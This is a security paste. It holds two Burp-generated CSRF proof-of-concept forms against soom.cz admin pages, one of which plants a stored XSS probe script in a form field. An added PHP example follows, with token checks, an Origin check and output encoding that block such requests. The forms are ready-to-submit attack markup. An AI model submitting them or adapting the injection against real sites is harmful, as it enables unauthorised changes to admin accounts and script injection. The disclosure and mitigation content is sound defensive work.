<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <h1>CSRF 1 - command creation</h1>
    <form action="https://www.soom.cz/projects/XSS_backdoor/admin/prikaz.php" method="POST">
      <input type="hidden" name="nazev" value="xss" />
      <input type="hidden" name="typ" value="1" />
      <input type="hidden" name="parametry" value="xss" />
      <input type="hidden" name="skript" value="xss" />
      <input type="hidden" name="s1" value="Vytvořit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <h1>CSRF 2 - stored xss</h1>
    <form action="https://www.soom.cz/projects/XSS_backdoor/admin/nastaveni.php?idclient=18f43d79bb" method="POST">
      <input type="hidden" name="nazev" value="xss" />
      <input type="hidden" name="url" value="http://" />
      <input type="hidden" name="url1" value="http://" />
      <input type="hidden" name="script" value="43" />
      <input type="hidden" name="script1" value="0" />
      <input type="hidden" name="parametry" value="zzzzz%27%22%3E%3Cscript%3Ealert%281%29%3C/script%3E" />
      <input type="hidden" name="parametry1" value="" />
      <input type="hidden" name="s1" value="Upravit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
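
Neither form above carries an anti-CSRF token, and the second one places markup in `parametry`. The following is an added example (not part of the paste and not the application's own code) of server-side checks that refuse such cross-site POSTs and encode the stored value on output; the field name `csrf_token`, the helper names and the origin `https://admin.example` are assumptions.

```php
<?php
declare(strict_types=1);

// Issue one random token per session; every admin form embeds it as a
// hidden field (hypothetical field name: csrf_token).
function csrf_token(array &$session): string
{
    if (!isset($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Accept a state-changing POST only if it carries the session's token and,
// when the browser sends an Origin header, that header names our own origin.
function csrf_ok(array $session, array $post, array $server, string $ownOrigin): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return false;
    }
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf'] ?? '';
    // hash_equals compares in constant time; an empty expected token never matches.
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Encode stored values when writing them into HTML, so markup saved in a
// field such as "parametry" is rendered as text instead of being parsed.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo input: a POST shaped like the first form above (no token
// field) and the same POST as the application's own page would send it.
$session = [];
$token   = csrf_token($session);
$own     = 'https://admin.example'; // placeholder origin
$forged  = ['nazev' => 'xss', 'typ' => '1', 's1' => 'Vytvořit'];
$legit   = $forged + ['csrf_token' => $token];

var_dump(csrf_ok($session, $forged, ['HTTP_ORIGIN' => 'https://other.example'], $own));
var_dump(csrf_ok($session, $forged, [], $own));
var_dump(csrf_ok($session, $legit, ['HTTP_ORIGIN' => $own], $own));
echo h('zzzzz\'"><script>alert(1)</script>'), PHP_EOL;
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer on top of the token check, since the cookie is then withheld from cross-site form POSTs.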